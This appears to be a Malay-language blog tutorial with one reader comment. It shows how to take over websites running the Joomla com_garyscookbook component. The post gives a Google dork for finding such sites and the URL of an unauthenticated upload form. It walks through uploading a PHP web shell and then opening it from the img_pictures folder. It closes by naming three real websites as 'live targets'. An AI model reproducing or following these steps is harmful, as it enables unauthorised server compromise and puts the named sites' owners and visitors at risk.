1. Mula-mula search google dork :
"inurl:com_garyscookbook"
2. Pilih salah satu website.Masukkan exploit ini di hujung url :
/index.php?option=com_garyscookbook&func=newItem
/index.php?option=com_garyscookbook&func=newItem
Paparan website tu lebih kurang macam ni :
3. Seterusnya, kita nak isi maklumat.
CLICK!
- Mula2 isi di bahagian NAME.isi ja apa pun.
- Lepas tu pilih kategory.hentam saja >.<
- Seterusnya tekan choose file dan ambil shell korang.
- Kotak2 lain korang tak perlu isi.
Lepas dah isi semua tu dan choose file,korang scroll turun bawah sekali dan tengok ada butang submission.rujuk gambar :
CLICK!
4. Lepas dah click akan keluar page baru macam ni :
5. Akhir sekali kita nak masuk shell kita.Ok ada dua cara.cara pertama ialah tambah exploit di hujung url :
/components/com_garyscookbook/img_pictures/shell.php
/components/com_garyscookbook/img_pictures/shell.php
Gantikan shell.php dengan nama shell korang.
Kalau korang tak boleh buka shell korang tu,404 ke atau apa2, guna cara kedua.
Cara kedua ialah korang right click dekat gambar rosak dan "open image in new tab".
Rujuk gambar :
Rujuk gambar :
DONE!
Live target :
http://www.kouzinapapanagiotou.gr/index.php?option=com_garyscookbook&func=newItem
http://oneiron.gr/index.php?option=com_garyscookbook&func=newItem
https://www.vitamix.co.uk/index.php?option=com_garyscookbook&func=newItem
Baiklah itu saja untuk tuto exploit kali ini.semoga berjaya.
Assalamualaikum
knp bila dah upoad shell die kuar mcm "gambar koyak"
ReplyDelete